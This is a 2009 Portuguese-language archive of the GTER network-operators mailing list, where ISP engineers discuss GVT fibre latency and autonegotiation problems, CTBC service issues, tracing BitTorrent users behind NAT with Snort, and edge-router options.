atr?s de um NAT. E quando recebemos > > notifica??es de abuso de copyright, o IP reportado ? sempre o do > > gateway. > > > Uma possibilidade que eu estava tentando analisar, seria o uso de > > algum cache de p2p, mas que esse cache gera-se log de tudo que est? > > passando atrav?s dele. > > > Qualquer sugest?o ? bem-vinda. > > N?o leve a mal a pergunta mas j? pensou em dar IP p?blico din?mico > a seus clientes? > > []s, !3runo Cabral > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- --- Eu apoio Software Livre!!! From killabc at gmail.com Sun Jun 7 21:18:49 2009 From: killabc at gmail.com (Kill ABC) Date: Sun, 7 Jun 2009 21:18:49 -0300 Subject: [GTER] Problemas GVT - o que fazer? (Ricardo Castanheira) In-Reply-To: <01E8EC18AAF44C43AA013EDAB0C6BD61@SUporteHerlon> References: <01E8EC18AAF44C43AA013EDAB0C6BD61@SUporteHerlon> Message-ID: Ola Tenho um link gvt de 10 mb full chegando ao meu backbone, tava fazendo alguns testes e dava um perda miseravel algo entre 1 %. Ai fui testar meu link full 10mb nao tava dando 10 mb nem pra down e nem pra up, abri um chamado com a equipe tecnica e segundo eles mudaram o protocolo de comunica??o dos conversores de fibra que temos entre meu backbone e o backbone deles. Pra mim s? acertaram a velocidade das conexoes entre negocia??o autom?tica e 100mb full fixa. Quando consegui comunica??o com o t?cnico deles ele foi categ?rico dizendo que tava obtendo erro na porta de comunica??o deles, ai falei que meu router tava zerado. So assim pra conseguir que me resolvessem o problema. -- T+_+ Kill ABC ICQ 36741022 - MAC OS X Leopard 10.5.6 "O futuro tem varios nomes: para os fracos, ele ? inating?vel; para os temerosos, ele ? desconhecido; para os corajosos, ele ? a chance..." 2009/6/6 Herlon Alcantara Matos > Tive o mesmo problema com a Embratel (Datacom). > > Todo dia, abria um chamado. > O pior era a ignorancia dos atendentes do suporte, Sr. no teste de icmp n?o > consta nenhum problema. > Depois de muito insistir me disseram ser um problema na FastEthernet de meu > Cisco, pois do lado deles n?o era perceptivel tal problema. > Solicitei que descrevessem isto na solu??o do chamado, adquiri outra > interface, mudei de posi??o no roteador e mesmo assim continuou o problema. > Abri um novo chamado de posse da interface nova, quando o pessoal tecnico > deles chegou, novamente a alega??o foi a mesma. De posse da nova interface, > coloquei ela e configurei no router e pedi para que provassem que era o > problema da interface nova. (Dura??o desta novela 21 dias) > O que resultou finalmente na troca do equipamento por eles. > > Sugiro que fa?a o mesmo procedimento com GVT. > > Herlon > LCI Telecom > > ----- Original Message ----- From: > To: > Sent: Friday, June 05, 2009 4:49 PM > Subject: gter Digest, Vol 75, Issue 25 > > > Send gter mailing list submissions to >> gter at eng.registro.br >> >> To subscribe or unsubscribe via the World Wide Web, visit >> https://eng.registro.br/mailman/listinfo/gter >> or, via email, send a message with subject or body 'help' to >> gter-request at eng.registro.br >> >> You can reach the person managing the list at >> gter-owner at eng.registro.br >> >> When replying, please edit your Subject line so it is more specific >> than "Re: Contents of gter digest..." >> >> >> Today's Topics: >> >> 1. Re: Problemas GVT - o que fazer? (Ricardo Castanheira) >> >> ---------------------------------------------------------------------- >> >> Message: 1 >> Date: Fri, 5 Jun 2009 11:48:05 +0000 >> From: Ricardo Castanheira >> Subject: Re: [GTER] Problemas GVT - o que fazer? >> To: >> Message-ID: >> Content-Type: text/plain; charset="iso-8859-1" >> >> >> Rubens est? correto na temos um legado antigo em SP. >> >> Ricardo Castanheira >> >> Date: Thu, 4 Jun 2009 23:26:32 -0300 >>> From: rubensk at gmail.com >>> To: gter at eng.registro.br >>> Subject: Re: [GTER] Problemas GVT - o que fazer? >>> >>> Eu me referi ? rede da CTBC que antes era Iqara Telecom, na regi?o >>> metropolitana de SP. >>> Voc? se refere ? rede da CTBC no Tri?ngulo Mineiro ? Porque realmente >>> me falam que a rede no tri?ngulo ? toda Cisco. >>> >>> >>> Rubens >>> >>> >>> 2009/6/4 Ricardo Castanheira : >>> > >>> > Rubens, a rede da CTBC "Metro" ? 100% cisco. >>> > O produtos da DataCom n?o est?o nem homologados. >>> > Fora da rede metro pode haver sim. >>> > >>> > Abra?os >>> > Ricardo Castanheira >>> > >>> >> Date: Thu, 4 Jun 2009 14:02:30 -0300 >>> >> From: rubensk at gmail.com >>> >> To: gter at eng.registro.br >>> >> Subject: Re: [GTER] Problemas GVT - o que fazer? >>> >> >>> >> Infelizmente a rede metro da CTBC ? quase toda DATACOM, com alguns >>> >> Cisco apenas quando necess?rios features tipo QinQ. Espero que seu >>> >> e-mail chegue a algu?m de l?... >>> >> >>> >> >>> >> Rubens >>> >> >>> >> >>> >> 2009/6/3 Andr? Costa : >>> >> > Caros colegas, >>> >> > >>> >> > Se for envolvido equipamento DATACOM realmente existe at? uma nota >>> >> > no site >>> >> > deles falando sobre o assunto, as teles tem seguido o conselho de >> >>> > for?ar a >>> >> > porta. >>> >> > >>> >> > Aqui na empresa resolvemos n?o utilizar mais DATACOM por esses e >> >>> > outros >>> >> > problemas. S?o equipamentos muito problem?tico e suporte ? p?ssimo. >>> >> > >>> >> > >>> >> > >>> >> > 2009/6/3 Patrich Pizzolo >>> >> > >>> >> >> Obrigado pelas respostas, >>> >> >> n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 >>> >> >> dias >>> >> >> atr?s este problema aqui, s? ficou ok quando forcei minha eth para >>> >> >> 100Mbps >>> >> >> Full-Duplex! >>> >> >> Por?m o problema est? bem isolado, j? coloquei diversos notebooks e >>> >> >> desktops >>> >> >> e o problema sempre persiste sim! >>> >> >> >>> >> >> Creio que seja exatamente o caso de porta do Switch Datacom no qual >>> >> >> o >>> >> >> Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente >>> >> >> de conta >>> >> >> e ouvidoria para verificarem isto e eles continuam afirmando >>> >> >> categoricamente >>> >> >> que n?o h? problema! >>> >> >> >>> >> >> Alguma id?ia? >>> >> >> >>> >> >> >>> >> >> 2009/6/3 Juliano S. Nascimento >>> >> >> >>> >> >> > >>> >> >> > >>> >> >> > >>> >> >> > > Voce checou poss?veis port-mismatch ? >>> >> >> > Auto-negocia??o X portas for?adas ? >>> >> >> > > >>> >> >> > > Corre uma lenda por a? que as portas fastethernet devem ser >>> >> >> > for?adas a >>> >> >> > > 100Mb/s. Na verdade essa hist?ria >>> >> >> > remonta h? anos quando existia um bug na >>> >> >> > > >>> >> >> > negocia??o de alguns equipamentos que faziam os mesmos >>> >> >> > negociarem como >>> >> >> > > half. >>> >> >> > > Isso acabou e s? sobrou a >>> >> >> > lenda. >>> >> >> > > >>> >> >> > > A regra ?: >>> >> >> > > >>> >> >> > > - >>> >> >> > Auto-negocia??o com auto-negoci???o >>> >> >> > > - Porta for?ada (sem autoneg) com Porta for?ada >>> >> >> > > >>> >> >> > > Qualquer outra combina??o trar? >>> >> >> > problemas. >>> >> >> > > >>> >> >> > > Voc? colocou 1 notebook ligado >>> >> >> > direto no link para eliminar problemas com >>> >> >> > > sua rede, seu >>> >> >> > firewall, etc? >>> >> >> > > >>> >> >> > > Grato. >>> >> >> > > >>> >> >> > > 2009/6/3 >>> >> >> > Patrich Pizzolo >>> >> >> > > >>> >> >> > >> Bom dia >>> >> >> > a todos, >>> >> >> > >> gostaria de ter uma opini?o dos ilustres >>> >> >> > colegas que integram esta >>> >> >> > >> lista. >>> >> >> > >> Tenho um link >>> >> >> > de 10Mbps por fibra e ap?s um problema em um switch da GVT >>> >> >> > >> meu >>> >> >> > >> tempo de resposta entre a Eth do meu router e >>> >> >> > a do router da gvt que s?o >>> >> >> > >> interligados por uma fibra >>> >> >> > est? chegando a picos de at? 946ms com uma >>> >> >> > >> >>> >> >> > m?dia >>> >> >> > >> em torno de 10ms, isso com o link isolado e >>> >> >> > j? testei com diversos >>> >> >> > >> outros >>> >> >> > >> routers e >>> >> >> > sempre obtenho os mesmos tempos de resposta, definitivamente >>> >> >> > >> >>> >> >> > n?o >>> >> >> > >> tenho problema nesta ponta. Possuo um outro link >>> >> >> > com a BrT e est? tudo >>> >> >> > >> normal com tempo de resposta >>> >> >> > excelente sem nenhuma varia??o deste tipo. >>> >> >> > >> >>> >> >> > Estou nesta situa??o h? 7 dias e o pessoal da >>> >> >> > operadora insiste em dizer >>> >> >> > >> que >>> >> >> > >> est? >>> >> >> > tudo normal. J? nem aguento mais falar com eles... >>> >> >> > >> >>> >> >> > >> Algu?m tem alguma id?ia? >>> >> >> > >> >>> >> >> > >> No momento estou pensando em acionar e cancelar o link. >>> >> >> > >>> >> >> > Caro, >>> >> >> > >>> >> >> > Tivemos o mesmo problema algum tempo atras com a >>> >> >> > GVT. Depois de muitos testes e alegarem que nossos servidores >> >>> >> > estavam mal >>> >> >> > configurados e n?o terem resultados positivos com esta >>> >> >> > afirma??o, trocaram nossa porta no Switch deles, resolvendo >>> >> >> > nosso problema. >>> >> >> > >>> >> >> > OBS: Alegaram que a vlan estava com uma >>> >> >> > configura??o errada, ocasionado tais problemas. >>> >> >> > >>> >> >> > >>> >> >> > >>> >> >> > >> >>> >> >> > >> Abra?os, >>> >> >> > >> >>> >> >> > Obrigado! >>> >> >> > >> -- >>> >> >> > >> gter list >>> >> >> > https://eng.registro.br/mailman/listinfo/gter >>> >> >> > >> >>> >> >> > > >>> >> >> > -- >>> >> >> > > gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> > > >>> >> >> > >>> >> >> > >>> >> >> > -- >>> >> >> > >>> >> >> > >>> >> >> > -- >>> >> >> > gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> > >>> >> >> >>> >> >> >>> >> >> >>> >> >> -- >>> >> >> Abra?os, >>> >> >> >>> >> >> Patrich Pizzolo >>> >> >> IT Coordinator >>> >> >> +55-48-9944-9090 >>> >> >> +55-47-8407-7768 >>> >> >> pizzolo at gmail.com >>> >> >> Skype: pizzolo_br >>> >> >> MSN: patrich_pizzolo at hotmail.com >>> >> >> SL: Xpiz Beam >>> >> >> Taikodom: Deathwing_br >>> >> >> -- >>> >> >> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> >>> >> > >>> >> > >>> >> > >>> >> > -- >>> >> > Andr? Costa >>> >> > Chief Executive Officer >>> >> > Ib?ria Brasil Telecomunica??es >>> >> > (71) 2223-9026 / 7811-5816 >>> >> > NEXTEL 55*91*9228 >>> >> > -- >>> >> > gter list https://eng.registro.br/mailman/listinfo/gter >>> >> -- >>> >> gter list https://eng.registro.br/mailman/listinfo/gter >>> > >>> > _________________________________________________________________ >>> > Show them the way! Add maps and directions to your party invites. >>> > http://www.microsoft.com/windows/windowslive/products/events.aspx >>> > -- >>> > gter list https://eng.registro.br/mailman/listinfo/gter >>> > >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> _________________________________________________________________ >> Show them the way! Add maps and directions to your party invites. >> http://www.microsoft.com/windows/windowslive/products/events.aspx >> >> ------------------------------ >> >> -- >> gter digest list https://eng.registro.br/mailman/listinfo/gter >> >> End of gter Digest, Vol 75, Issue 25 >> ************************************ >> > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From pizzolo at gmail.com Sun Jun 7 18:38:17 2009 From: pizzolo at gmail.com (Patrich Pizzolo) Date: Sun, 7 Jun 2009 18:38:17 -0300 Subject: [GTER] Problemas GVT - o que fazer? (Ricardo Castanheira) In-Reply-To: <01E8EC18AAF44C43AA013EDAB0C6BD61@SUporteHerlon> References: <01E8EC18AAF44C43AA013EDAB0C6BD61@SUporteHerlon> Message-ID: <37899f4a0906071438q64184fcbl6ea3e4e52cf83416@mail.gmail.com> Grato Herlon, j? estou h? 10 dias nesta novela mexicana, fiz algo parecido aqui e na quinta-feira ficou comprovado que o problema existia e que n?o era do meu lado, segundo eles est?o estudando o que v?o fazer(apesar de que desde 10 dias atr?s estou falando que o problema deve estar neste switch e reafirmado essa tese quando outros aqui da lista manifestaram ter o mesmo problema), estou no aguardo e enviarei aqui para lista o resultado. Muito obrigado! Patrich 2009/6/6 Herlon Alcantara Matos > Tive o mesmo problema com a Embratel (Datacom). > > Todo dia, abria um chamado. > O pior era a ignorancia dos atendentes do suporte, Sr. no teste de icmp n?o > consta nenhum problema. > Depois de muito insistir me disseram ser um problema na FastEthernet de meu > Cisco, pois do lado deles n?o era perceptivel tal problema. > Solicitei que descrevessem isto na solu??o do chamado, adquiri outra > interface, mudei de posi??o no roteador e mesmo assim continuou o problema. > Abri um novo chamado de posse da interface nova, quando o pessoal tecnico > deles chegou, novamente a alega??o foi a mesma. De posse da nova interface, > coloquei ela e configurei no router e pedi para que provassem que era o > problema da interface nova. (Dura??o desta novela 21 dias) > O que resultou finalmente na troca do equipamento por eles. > > Sugiro que fa?a o mesmo procedimento com GVT. > > Herlon > LCI Telecom > > ----- Original Message ----- From: > To: > Sent: Friday, June 05, 2009 4:49 PM > Subject: gter Digest, Vol 75, Issue 25 > > > Send gter mailing list submissions to >> gter at eng.registro.br >> >> To subscribe or unsubscribe via the World Wide Web, visit >> https://eng.registro.br/mailman/listinfo/gter >> or, via email, send a message with subject or body 'help' to >> gter-request at eng.registro.br >> >> You can reach the person managing the list at >> gter-owner at eng.registro.br >> >> When replying, please edit your Subject line so it is more specific >> than "Re: Contents of gter digest..." >> >> >> Today's Topics: >> >> 1. Re: Problemas GVT - o que fazer? (Ricardo Castanheira) >> >> ---------------------------------------------------------------------- >> >> Message: 1 >> Date: Fri, 5 Jun 2009 11:48:05 +0000 >> From: Ricardo Castanheira >> Subject: Re: [GTER] Problemas GVT - o que fazer? >> To: >> Message-ID: >> Content-Type: text/plain; charset="iso-8859-1" >> >> >> Rubens est? correto na temos um legado antigo em SP. >> >> Ricardo Castanheira >> >> Date: Thu, 4 Jun 2009 23:26:32 -0300 >>> From: rubensk at gmail.com >>> To: gter at eng.registro.br >>> Subject: Re: [GTER] Problemas GVT - o que fazer? >>> >>> Eu me referi ? rede da CTBC que antes era Iqara Telecom, na regi?o >>> metropolitana de SP. >>> Voc? se refere ? rede da CTBC no Tri?ngulo Mineiro ? Porque realmente >>> me falam que a rede no tri?ngulo ? toda Cisco. >>> >>> >>> Rubens >>> >>> >>> 2009/6/4 Ricardo Castanheira : >>> > >>> > Rubens, a rede da CTBC "Metro" ? 100% cisco. >>> > O produtos da DataCom n?o est?o nem homologados. >>> > Fora da rede metro pode haver sim. >>> > >>> > Abra?os >>> > Ricardo Castanheira >>> > >>> >> Date: Thu, 4 Jun 2009 14:02:30 -0300 >>> >> From: rubensk at gmail.com >>> >> To: gter at eng.registro.br >>> >> Subject: Re: [GTER] Problemas GVT - o que fazer? >>> >> >>> >> Infelizmente a rede metro da CTBC ? quase toda DATACOM, com alguns >>> >> Cisco apenas quando necess?rios features tipo QinQ. Espero que seu >>> >> e-mail chegue a algu?m de l?... >>> >> >>> >> >>> >> Rubens >>> >> >>> >> >>> >> 2009/6/3 Andr? Costa : >>> >> > Caros colegas, >>> >> > >>> >> > Se for envolvido equipamento DATACOM realmente existe at? uma nota >>> >> > no site >>> >> > deles falando sobre o assunto, as teles tem seguido o conselho de >> >>> > for?ar a >>> >> > porta. >>> >> > >>> >> > Aqui na empresa resolvemos n?o utilizar mais DATACOM por esses e >> >>> > outros >>> >> > problemas. S?o equipamentos muito problem?tico e suporte ? p?ssimo. >>> >> > >>> >> > >>> >> > >>> >> > 2009/6/3 Patrich Pizzolo >>> >> > >>> >> >> Obrigado pelas respostas, >>> >> >> n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 >>> >> >> dias >>> >> >> atr?s este problema aqui, s? ficou ok quando forcei minha eth para >>> >> >> 100Mbps >>> >> >> Full-Duplex! >>> >> >> Por?m o problema est? bem isolado, j? coloquei diversos notebooks e >>> >> >> desktops >>> >> >> e o problema sempre persiste sim! >>> >> >> >>> >> >> Creio que seja exatamente o caso de porta do Switch Datacom no qual >>> >> >> o >>> >> >> Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente >>> >> >> de conta >>> >> >> e ouvidoria para verificarem isto e eles continuam afirmando >>> >> >> categoricamente >>> >> >> que n?o h? problema! >>> >> >> >>> >> >> Alguma id?ia? >>> >> >> >>> >> >> >>> >> >> 2009/6/3 Juliano S. Nascimento >>> >> >> >>> >> >> > >>> >> >> > >>> >> >> > >>> >> >> > > Voce checou poss?veis port-mismatch ? >>> >> >> > Auto-negocia??o X portas for?adas ? >>> >> >> > > >>> >> >> > > Corre uma lenda por a? que as portas fastethernet devem ser >>> >> >> > for?adas a >>> >> >> > > 100Mb/s. Na verdade essa hist?ria >>> >> >> > remonta h? anos quando existia um bug na >>> >> >> > > >>> >> >> > negocia??o de alguns equipamentos que faziam os mesmos >>> >> >> > negociarem como >>> >> >> > > half. >>> >> >> > > Isso acabou e s? sobrou a >>> >> >> > lenda. >>> >> >> > > >>> >> >> > > A regra ?: >>> >> >> > > >>> >> >> > > - >>> >> >> > Auto-negocia??o com auto-negoci???o >>> >> >> > > - Porta for?ada (sem autoneg) com Porta for?ada >>> >> >> > > >>> >> >> > > Qualquer outra combina??o trar? >>> >> >> > problemas. >>> >> >> > > >>> >> >> > > Voc? colocou 1 notebook ligado >>> >> >> > direto no link para eliminar problemas com >>> >> >> > > sua rede, seu >>> >> >> > firewall, etc? >>> >> >> > > >>> >> >> > > Grato. >>> >> >> > > >>> >> >> > > 2009/6/3 >>> >> >> > Patrich Pizzolo >>> >> >> > > >>> >> >> > >> Bom dia >>> >> >> > a todos, >>> >> >> > >> gostaria de ter uma opini?o dos ilustres >>> >> >> > colegas que integram esta >>> >> >> > >> lista. >>> >> >> > >> Tenho um link >>> >> >> > de 10Mbps por fibra e ap?s um problema em um switch da GVT >>> >> >> > >> meu >>> >> >> > >> tempo de resposta entre a Eth do meu router e >>> >> >> > a do router da gvt que s?o >>> >> >> > >> interligados por uma fibra >>> >> >> > est? chegando a picos de at? 946ms com uma >>> >> >> > >> >>> >> >> > m?dia >>> >> >> > >> em torno de 10ms, isso com o link isolado e >>> >> >> > j? testei com diversos >>> >> >> > >> outros >>> >> >> > >> routers e >>> >> >> > sempre obtenho os mesmos tempos de resposta, definitivamente >>> >> >> > >> >>> >> >> > n?o >>> >> >> > >> tenho problema nesta ponta. Possuo um outro link >>> >> >> > com a BrT e est? tudo >>> >> >> > >> normal com tempo de resposta >>> >> >> > excelente sem nenhuma varia??o deste tipo. >>> >> >> > >> >>> >> >> > Estou nesta situa??o h? 7 dias e o pessoal da >>> >> >> > operadora insiste em dizer >>> >> >> > >> que >>> >> >> > >> est? >>> >> >> > tudo normal. J? nem aguento mais falar com eles... >>> >> >> > >> >>> >> >> > >> Algu?m tem alguma id?ia? >>> >> >> > >> >>> >> >> > >> No momento estou pensando em acionar e cancelar o link. >>> >> >> > >>> >> >> > Caro, >>> >> >> > >>> >> >> > Tivemos o mesmo problema algum tempo atras com a >>> >> >> > GVT. Depois de muitos testes e alegarem que nossos servidores >> >>> >> > estavam mal >>> >> >> > configurados e n?o terem resultados positivos com esta >>> >> >> > afirma??o, trocaram nossa porta no Switch deles, resolvendo >>> >> >> > nosso problema. >>> >> >> > >>> >> >> > OBS: Alegaram que a vlan estava com uma >>> >> >> > configura??o errada, ocasionado tais problemas. >>> >> >> > >>> >> >> > >>> >> >> > >>> >> >> > >> >>> >> >> > >> Abra?os, >>> >> >> > >> >>> >> >> > Obrigado! >>> >> >> > >> -- >>> >> >> > >> gter list >>> >> >> > https://eng.registro.br/mailman/listinfo/gter >>> >> >> > >> >>> >> >> > > >>> >> >> > -- >>> >> >> > > gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> > > >>> >> >> > >>> >> >> > >>> >> >> > -- >>> >> >> > >>> >> >> > >>> >> >> > -- >>> >> >> > gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> > >>> >> >> >>> >> >> >>> >> >> >>> >> >> -- >>> >> >> Abra?os, >>> >> >> >>> >> >> Patrich Pizzolo >>> >> >> IT Coordinator >>> >> >> +55-48-9944-9090 >>> >> >> +55-47-8407-7768 >>> >> >> pizzolo at gmail.com >>> >> >> Skype: pizzolo_br >>> >> >> MSN: patrich_pizzolo at hotmail.com >>> >> >> SL: Xpiz Beam >>> >> >> Taikodom: Deathwing_br >>> >> >> -- >>> >> >> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> >>> >> > >>> >> > >>> >> > >>> >> > -- >>> >> > Andr? Costa >>> >> > Chief Executive Officer >>> >> > Ib?ria Brasil Telecomunica??es >>> >> > (71) 2223-9026 / 7811-5816 >>> >> > NEXTEL 55*91*9228 >>> >> > -- >>> >> > gter list https://eng.registro.br/mailman/listinfo/gter >>> >> -- >>> >> gter list https://eng.registro.br/mailman/listinfo/gter >>> > >>> > _________________________________________________________________ >>> > Show them the way! Add maps and directions to your party invites. >>> > http://www.microsoft.com/windows/windowslive/products/events.aspx >>> > -- >>> > gter list https://eng.registro.br/mailman/listinfo/gter >>> > >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> >> _________________________________________________________________ >> Show them the way! Add maps and directions to your party invites. >> http://www.microsoft.com/windows/windowslive/products/events.aspx >> >> ------------------------------ >> >> -- >> gter digest list https://eng.registro.br/mailman/listinfo/gter >> >> End of gter Digest, Vol 75, Issue 25 >> ************************************ >> > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From patrick at vol.net.br Sun Jun 7 23:48:52 2009 From: patrick at vol.net.br (Patrick Barreto Petronetto) Date: Sun, 7 Jun 2009 23:48:52 -0300 Subject: [GTER] RES: Log de P2P In-Reply-To: <31d2512c0906071410m12921a04y322c0d3f906e6d6a@mail.gmail.com> References: <1244333873536.Bruno@Openline.com.br> <31d2512c0906071410m12921a04y322c0d3f906e6d6a@mail.gmail.com> Message-ID: Em bridge tamb?m funciona perfeitamente. Mas caso voc? n?o queira negar os pacotes e criar mais um ponto de falha na rede recomendo que voc? coloque o Snort conectado a uma porta do switch com port mirror configurado. []'s Patrick B. Petronetto -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Luiz Henrique G. Granja Enviada em: domingo, 7 de junho de 2009 18:11 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] Log de P2P Bruno, o que pode-se fazer ? colocar o SNORT e analisar de onde vem o P2P. Eu aconselho a colocar um host (maquina) em modo bridge e levantar estas informa??es. []'s Luiz Granja 2009/6/6 Bruno at Openline.com.br > --- Rafael Henrique Faria escreveu: > > Estamos com um problema na identifica??o do uso de programas P2P, mais > > precisamente no protocolo Bittorrent. > > > > Temos diversos usu?rios atr?s de um NAT. E quando recebemos > > notifica??es de abuso de copyright, o IP reportado ? sempre o do > > gateway. > > > Uma possibilidade que eu estava tentando analisar, seria o uso de > > algum cache de p2p, mas que esse cache gera-se log de tudo que est? > > passando atrav?s dele. > > > Qualquer sugest?o ? bem-vinda. > > N?o leve a mal a pergunta mas j? pensou em dar IP p?blico din?mico > a seus clientes? > > []s, !3runo Cabral > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- --- Eu apoio Software Livre!!! -- gter list https://eng.registro.br/mailman/listinfo/gter From juliano at cyberweb.com.br Mon Jun 8 10:13:13 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Mon, 08 Jun 2009 10:13:13 -0300 Subject: [GTER] Problemas GVT - o que fazer? (Ricardo Castanheira) In-Reply-To: References: <01E8EC18AAF44C43AA013EDAB0C6BD61@SUporteHerlon> Message-ID: <4A2D0E69.5030904@cyberweb.com.br> Verifica se o teu contrato ? de 10 Mb + OVERHEAD ou 10 Mb (e voce assume o overhead dentro do contrato) Verifica tamb?m se o status da porta esta em full duplex em AMBOS os lados. Juliano Kill ABC escreveu: > Ola > > Tenho um link gvt de 10 mb full chegando ao meu backbone, tava fazendo > alguns testes e dava um perda miseravel algo entre 1 %. Ai fui testar meu > link full 10mb nao tava dando 10 mb nem pra down e nem pra up, abri um > chamado com a equipe tecnica e segundo eles mudaram o protocolo de > comunica??o dos conversores de fibra que temos entre meu backbone e o > backbone deles. Pra mim s? acertaram a velocidade das conexoes entre > negocia??o autom?tica e 100mb full fixa. > > Quando consegui comunica??o com o t?cnico deles ele foi categ?rico dizendo > que tava obtendo erro na porta de comunica??o deles, ai falei que meu router > tava zerado. So assim pra conseguir que me resolvessem o problema. > > From dverzolla at fcl.com.br Mon Jun 8 09:27:41 2009 From: dverzolla at fcl.com.br (David Verzolla) Date: Mon, 8 Jun 2009 09:27:41 -0300 Subject: [GTER] CTBC - Problema Message-ID: <9D88AFD4E5500C4181300C8DACE8800C754E12@corpexch-01.corp.com> Lista, Semana passado os problemas com a CTBC foram not?rios. Nessa semana algu?m ainda continua com problemas? Estou com meu servi?o MPLS bastante intermitente. Abra?os, ??? David Verzolla [ Coordenador T?cnico de TI ] [ TI - Funda??o C?sper L?bero ] dverzolla at fcl.com.br From herlon at lcimt.com.br Mon Jun 8 08:35:13 2009 From: herlon at lcimt.com.br (Herlon Alcantara Matos) Date: Mon, 8 Jun 2009 07:35:13 -0400 Subject: [GTER] roteador de borda References: Message-ID: Quanto a capacidade do Mikrotik, atraves dos uso de routerboards, voc? encontra varios testes de performance no site. Assim como do Vyatta tambem. Em ambos os casos, leia as entre linhas, pois existe varios dados t?cnicos expostos l? que talvez para o seu caso fa?a toda a diferen?a. Quanto a recomenda??o de maquina, se preocupe bastante com a qualidade das placas de rede. Por que o conjunto de placas de rede no meu entender ? mais de 50% do sucesso. Herlon LCI Telecom ----- Original Message ----- From: To: Sent: Saturday, June 06, 2009 3:15 PM Subject: gter Digest, Vol 75, Issue 26 > Send gter mailing list submissions to > gter at eng.registro.br > > To subscribe or unsubscribe via the World Wide Web, visit > https://eng.registro.br/mailman/listinfo/gter > or, via email, send a message with subject or body 'help' to > gter-request at eng.registro.br > > You can reach the person managing the list at > gter-owner at eng.registro.br > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of gter digest..." > > > Today's Topics: > > 1. Re: RES: Ainda problemas com a telefonica (Rodrigo Melga?o Alves) > 2. Re: RES: roteador de borda (Gustavo Santos) > 3. Re: Rompimento de fibra (Augusto G. Andreollo) > 4. Re: roteador de borda (Herbert Faleiros) > 5. Re: Problemas GVT - o que fazer? (Ricardo Castanheira) > (Herlon Alcantara Matos) > 6. Re: Embratel e Telef?nica (Marconi Pereira) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Fri, 05 Jun 2009 13:19:27 -0300 > From: Rodrigo Melga?o Alves > Subject: Re: [GTER] RES: Ainda problemas com a telefonica > To: Grupo de Trabalho de Engenharia e Operacao de Redes > > Message-ID: <4A29458F.7000502 at cliknet.com.br> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > Epafras, > > Sou clientes da CTBC a mais de dez anos e j? que voc? deu este espa?o > gostaria de apresentar os maiores problemas que eu tenho visto com > rela??o ao atendimento. > Quanto se abre uma reclama??o no 0800 ? comum acontecer do t?cnico > fechar a reclama??o sem resolver o problema, parece que para n?o afetar > os indicadores. Segue como exemplo o protocolo 33424990 de 27/01/09 > Nunca em todo esse tempo que somos clientes recebemos um retorno que > qualquer das reclama??es abertas informando que foi solucionado e muito > menos o motivo. > Existe sempre um problema onde a informa??o das necessidades sempre s?o > distorcidas entre o departamento comercial e o departamento t?cnico da > CTBC. > Sempre que ultrapassa o prazo determinado de solu??o de um problema > abrimos uma reclama??o na Anatel e ? comum a reclama??o na Anatel ser > fechada incorretamente pela CTBC como: "defeito ? no cliente e n?o na > CTBC" ou "j? est? resolvido" > De uns 6 meses para c?, em algumas novas implanta??es colocaram uma > pessoa fazendo o meio de campo entre n?s e a ctbc (departamento t?cnico) > e isso funcionou maravilhosamente. Se isso acontecesse no p?s venda > tenho certeza que todos os outros problemas seriam minimizados para > pr?ximo de zero. > J? conversamos algumas vezes no passado e tenho certeza que voc? vai > lembrar que sou. Gosto muito da presta??o de servi?o da CTBC e estou > colocando isto no intuito de que voc?s possam avaliar e melhorar o > atendimento. > Foi mais uma vez um prazer conversar com voc?. > > Rodrigo Melga?o Alves > > epafras at ctbc.com.br escreveu: >> Grandes Mestres (Hebert, Rubens, Juliano and all), >> >> ? sempre bom para n?s ouvirmos depoimentos legais como o do Hebert e >> trabalhamos sempre para que tenhamos mais e mais fatos como este aqui na >> CTBC. Tamb?m pessoalmente n?o tenho a inten??o de resolver todos os >> problemas mas, se algum de voc?s tiver alguma complica??o no >> relacionamento conosco, principalmente com rela??o a roteamento (?rea que >> me compete), fiquem a vontade em me acionar diretamente... no demais, >> estamos trabalhando para melhorar sempre... at? IPv6 aqui j? funciona >> n?o eh Juliano ??? :-) >> >> Valeu.. Abs.. >> >> Epafras Schaden >> Engenharia de Redes IP >> CTBC/Algar Telecom >> >> >> >> >> >> >> Re: [GTER] RES: Ainda problemas com a telefonica >> >> Juliano Primavesi - Cyberweb Networks >> para: >> Grupo de Trabalho de Engenharia e Operacao de Redes >> 04/06/2009 14:09 >> >> >> Enviado por: >> gter-bounces at eng.registro.br >> Responda a Grupo de Trabalho de Engenharia e Operacao de Redes >> >> >> >> >> >> >> >> Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, >> acabei eu mesmo por resolver um certo problema de publica??o de rotas... >> >> Juliano >> >> Rubens Kuhl escreveu: >> >>> Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor >>> do que a nossa. >>> >>> >>> Rubens >>> >>> >>> >>> >>>> Ontem tive problemas com um link Algar (CTBC), o atendimento foi super >>>> >> r?pido, >> >>>> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava >>>> falando, anotaram todos os dados pertinentes e em poucos minutos algu?m >>>> >> n?vel >> >>>> 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem >>>> >> o >> >>>> problema ligaram novamente perguntando como estava o link! >>>> >>>> Quem est? acostumado 